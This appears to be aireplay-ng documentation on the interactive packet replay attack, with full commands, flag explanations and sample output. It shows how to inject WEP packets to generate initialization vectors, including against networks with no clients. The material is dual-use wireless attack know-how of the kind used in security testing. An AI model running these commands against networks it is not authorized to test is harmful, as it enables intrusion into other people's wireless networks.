This attack allows you to choose a specific packet for replaying (injecting). The attack can obtain packets to replay from two sources. The first being a live flow of packets from your wireless card. The second being from a pcap file. Standard Pcap format (Packet CAPture, associated with the libpcap library http://www.tcpdump.org), is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often overlooked feature of aireplay-ng. This allows you read packets from other capture sessions or quite often, various attacks generate pcap files for easy reuse. A common use of reading a file containing a packet your created with packetforge-ng.

aireplay-ng -2 <filter options> <replay options> -r <file name> <replay interface>

Where:

• -2 means interactive replay attack
• <filter options> is described here
• <replay options> is described here
• -r <file name> used to specify a pcap file to read packets from (this is optional)
• <replay interface> is the wireless interface such ath0

You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs):

 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82  ath0

Where:

• -2 means the interactive replay attack
• -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
• -c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV.
• -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
• -h 00:0F:B5:88:AC:82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
• ath0 is the wireless interface name.

The IVs generated per second will vary based on the size of the packet you select. The smaller the packet size, the higher the rate per second. When launched, the program will look as follows:

 Read 99 packets...
 
      Size: 139, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  01:00:5E:00:00:FB
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
      0x0010:  0040 f477 e5c9 5065 917f 0000 e053 b683  .@.w..Pe....S..
      0x0020:  fff3 795e 19a3 3313 b62c c9f3 c373 ef3e  ..y^..3..,...s.>
      0x0030:  87a0 751a 7d20 9e6c 59af 4d53 16d8 773c  ..u.} .lY.MS..w<
      0x0040:  af05 1021 8069 bbc8 06ea 59f3 3912 09a9  ...!.i....Y.9...
      0x0050:  c36d 1db5 a51e c627 11d1 d18c 2473 fae9  .m.....'....$s..
      0x0060:  84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea  ..z.......GcD.i.
      0x0070:  b65b df63 8893 279b 6ecf 1af8 c889 57f3  .[.c..'.n.....W.
      0x0080:  fea7 d663 21a6 3329 28c8 8f              ...c!.3)(..
 
 Use this packet ? 

Responding “y” results in the packets being injected:

 Saving chosen packet in replay_src-0303-103920.cap
 You should also start airodump-ng to capture replies.
 
 Sent 4772 packets...

By also including packet size filters you can easily also use attack 2 to manually replay WEP-encrypted ARP request packets. ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes:

aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF -h 00:0F:B5:88:AC:82 ath0

Where:

• -2 means the interactive replay attack
• -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
• -m 68 is the minimum packet length
• -n 86 is the maximum packet length
• -c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV.
• -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
• -h 00:0F:B5:88:AC:82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
• ath0 is the wireless interface name.

Once you start the program it looks as follows:

 Read 145 packets...
 
      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

At this point, only respond “y” if the packet is 68 or 86 bytes long, otherwise enter “n”. It now injects the packets:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.

As mentioned earlier, aireplay-ng can be used to replay packets from a pcap file. Notice in the previous example, aireplay-ng wrote a file called “replay_src-0303-124624.cap”. You are not limited to using files written by aireplay-ng, you can use any pcap file from airodump-ng, kismet, etc.

Here is an example using the output from the previous example:

aireplay-ng -2 -p 0841 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -r replay_src-0303-124624.cap ath0

Where:

• -2 means the interactive replay attack
• -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
• -c FF:FF:FF:FF:FF:FF NOTE: This is not included because an ARP packet already has the destination MAC address set to broadcast.
• -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
• -h 00:0F:B5:88:AC:82 sets is the MAC address of the packets being transmitted and should match your card's MAC address.
• ath0 is the wireless interface name.

The program responds:

      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

You then say “y” to select the packet. It then starts to inject the packets:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.
 
 End of file.

There are some interesting applications of the first example above. It can be used to attack networks without any connected wireless clients. Start the aireplay-ng attack per the example. Now sit back and wait for any packet to be broadcast. It does not matter what type. Just say “y” and bingo you are generating IVs. The tradeoff is speed, big packets yield lower IVs per second. The major advantages is it saves the steps of obtaining the xor stream (chopchop or fragmentation attacks), building a packet and launching relay attack.

This would also work on APs with clients. It would be faster since you don't have to wait for an ARP, any packet will do.

The most common problem is that you are not associated with the AP. Either use a source MAC address of a client already associated with the AP or use fake authentication.

Check the I am injecting but the ivs don't increase tutorial.

Also see the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.